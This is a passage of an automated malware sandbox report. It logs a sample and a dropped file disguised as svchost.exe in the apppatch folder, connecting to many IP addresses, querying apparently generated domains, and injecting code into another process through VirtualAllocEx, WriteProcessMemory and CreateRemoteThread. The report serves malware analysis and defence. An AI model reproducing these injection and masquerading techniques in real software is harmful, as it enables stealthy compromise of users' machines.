
HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 15.197.240.20 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.36.143 8001Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.108 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: gaqycow.com
Source: C:\Windows\apppatch\svchost.exeDomain query: pujygaq.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 5.79.71.225 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: pumyliq.com
Source: C:\Windows\apppatch\svchost.exeDomain query: vocymut.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.226 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.11.230 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.64.163.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 91.195.240.19 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 162.255.119.102 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 69.162.80.55 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 630000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1470000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2170000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: D90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3040000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2560000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2620000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 11E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3130000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2EC0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 10B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 26F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2920000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2000000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2960000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2240000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3060000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1010000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2530000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2AA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3130000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2630000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: B20000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 8A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2820000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2730000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2120000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2330000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2850000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F30000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2B70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2480000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 530000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F40000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: F30000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2ED0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2980000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401670
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_00401670
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_02BD4CC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006B4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,5_2_006B4CC0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014F4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_014F4CC0
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 631360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 1471360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 2BE1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 2D91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 2A81360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 29F1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 2171360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: D91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 20F1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 29A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 20D1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 3041360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 2D81360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: C91360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe EIP: 2561360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1FA1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2621360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11E1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 3131360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2EC1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2BF1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2DD1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 29E1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 27A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2F51360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 10B1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 26F1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 29E1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2921360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2001360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2961360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2241360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 3061360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1011360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 28C1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2531360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2AA1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 3131360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 27A1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2631360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 29C1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 27C1360Jump to behavior
Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2BA1360Jump to behavior
